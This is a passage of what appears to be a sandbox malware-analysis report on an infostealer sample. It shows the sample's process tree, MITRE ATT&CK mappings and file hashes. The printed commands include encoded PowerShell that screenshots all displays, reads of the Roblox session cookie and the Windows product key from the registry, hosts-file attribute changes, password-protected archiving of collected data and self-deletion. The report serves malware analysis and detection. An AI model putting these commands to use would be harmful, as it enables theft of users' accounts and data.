AIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4884
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cielvdna\cielvdna.cmdline"
        5⤵
        
        PID:2936
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES12B8.tmp" "c:\Users\Admin\AppData\Local\Temp\cielvdna\CSC3C58A7EA23C246BFB7A6849E83ED6CBD.TMP"
        6⤵
        
        PID:4524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2880
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:660
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2044
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4260
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:996
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2812
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4832
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4672
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3696
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3756
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3708
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4916
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI13842\rar.exe a -r -hp"mudi" "C:\Users\Admin\AppData\Local\Temp\FeUQu.zip" *"
    3⤵
    PID:4772
  - - C:\Users\Admin\AppData\Local\Temp\_MEI13842\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI13842\rar.exe a -r -hp"mudi" "C:\Users\Admin\AppData\Local\Temp\FeUQu.zip" *
      4⤵
      Executes dropped EXE
      PID:1852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4084
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3756
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3560
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1256
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3804
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\KashBeams.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1152
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2472

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4064

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb25ffcc40,0x7ffb25ffcc4c,0x7ffb25ffcc58
  2⤵
  PID:1520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1820,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1816 /prefetch:2
  2⤵
  PID:3232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2172,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2424 /prefetch:3
  2⤵
  PID:3940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2492 /prefetch:8
  2⤵
  PID:2892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1
  2⤵
  PID:2044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3324,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:2788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4584,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:1
  2⤵
  PID:1156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4820,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:8
  2⤵
  PID:4972
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  - Drops file in Program Files directory
  PID:3172
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x7ff729fe4698,0x7ff729fe46a4,0x7ff729fe46b0
    3⤵
    - Drops file in Program Files directory
    PID:3908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4948,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4880 /prefetch:8
  2⤵
  PID:5004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5172,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4876 /prefetch:8
  2⤵
  PID:1148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5136,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5212 /prefetch:8
  2⤵
  PID:2724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5148,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5192 /prefetch:8
  2⤵
  PID:3412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3820,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:1
  2⤵
  PID:4804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5472,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4852 /prefetch:8
  2⤵
  PID:4440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=3516,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3480 /prefetch:2
  2⤵
  PID:3772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5360,i,11959919731748909700,11797807529354818039,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=860 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:400

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
773da1a93d2fa07043695b4c88567350

SHA1
188904b8443d958f94eab090067c15001dc3e6df

SHA256
f267a77f4900813038b2656d2c40a60dd86b013a14bdd6903a25346b6f27dda3

SHA512
1d7c1cf731c141ddb64304c22fec6ef49c07551e36a3944accd3505dca700c1a9d361e4ea891a927ea01c8c2e08407d1cace3d9760072aa598118024880170cb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
d79b35ccf8e6af6714eb612714349097

SHA1
eb3ccc9ed29830df42f3fd129951cb8b791aaf98

SHA256
c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

SHA512
f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index

Filesize
216B

MD5
b2fc42f54f5bc74e49de9c7f0bbe1163

SHA1
3f4c83420e1ee943aa1c98643f3f21d4682d6423

SHA256
fc1fda19a222248686e8502fbe4db4e959dd97e2a2af0be10b8d5a3fe67bb04f

SHA512
69be28fc172314d7120d137909ae64a6ccd4eb93ee79d612f9063c8f68624efae98ed0b7f332d1079325538f2cc0962712ac0f4e3bb46636f2e613002665232f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
7c8b000a068e5c0a1ada9d1c13a34f2a

SHA1
f0ee94684c88df09dd448d91feda5e9681cf3f47

SHA256
46a8dff548b0059a43acbde494a2486882a0d0cfd9d2c9e8bc55f8c84604f0dd

SHA512
